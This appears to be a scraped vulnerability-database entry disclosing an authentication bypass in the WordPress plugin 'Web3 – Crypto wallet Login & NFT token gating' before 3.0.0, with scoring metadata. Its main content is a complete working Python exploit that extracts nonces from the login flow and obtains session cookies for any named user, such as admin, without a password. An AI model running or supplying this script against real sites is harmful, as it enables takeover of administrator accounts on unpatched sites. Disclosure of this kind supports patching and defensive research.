Lucene search

K
wpexploitVicent ribasWPEX-ID:7F30AB20-805B-422C-A9A5-21D39C570EE4
HistoryJan 17, 2024 - 12:00 a.m.

Web3 – Crypto wallet Login & NFT token gating < 3.0.0 - Authentication Bypass

2024-01-1700:00:00
vicent ribas
49
python script
web3
crypto wallet
nft token
authentication bypass
security
http
cookies
admin
wordpress nonce

6.8 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions ‘handle_auth_request’ and ‘hadle_login_request’. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.

Run the following Python script:

```
import requests
import re

URL_BASE = "http://localhost:8083"
LOGIN_PATH="/wp-login.php"
USERNAME = "admin"

def get_login_page():
    response = requests.get(f"{URL_BASE}/wp-login.php")
    nonce = extract_nonce(response.text)
    return response.cookies, nonce

def extract_nonce(html_content):
    pattern = r'\"wp_nonce\":\"(.*?)\"'
    match = re.search(pattern, html_content)
    if match:
        print("Website nonce:", match.group(1))
        return match.group(1)
    else:
        raise ValueError("Nonce not found in the HTML content.")

def post_data(cookies, nonce):
    headers = {
    }

    data = {
        "action": "type_of_request",
        "request": "login",
        "address": USERNAME,
        "mo_web3_verify_nonce": nonce
    }

    response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies)
    random_string = extract_random_string(response.text)
    return random_string

def extract_random_string(response_content):
    pattern = r'Random string: (\w+)'
    match = re.search(pattern, response_content)
    if match:
        print("User nonce:", match.group(1))
        return match.group(1)
    else:
        raise ValueError("Random string not found in the response content.")

def post_with_random_string(cookies, nonce, random_string):
    headers = {
    }

    data = {
        "address": USERNAME,
        "nonce": random_string,
        "mo_web3_hiddenform_nonce": nonce
    }

    response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies, allow_redirects=False)
    return response.cookies

def print_cookies(cookies_jar):
    for cookie in cookies_jar:
        print(f"{cookie.name}: {cookie.value}")

def main():
    cookies, nonce = get_login_page()
    random_string = post_data(cookies, nonce)
    new_cookies = post_with_random_string(cookies, nonce, random_string)
    print("----------------")
    print("Cookies:")
    print_cookies(new_cookies)

if __name__ == "__main__":
    main()
```

6.8 Medium

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

Related for WPEX-ID:7F30AB20-805B-422C-A9A5-21D39C570EE4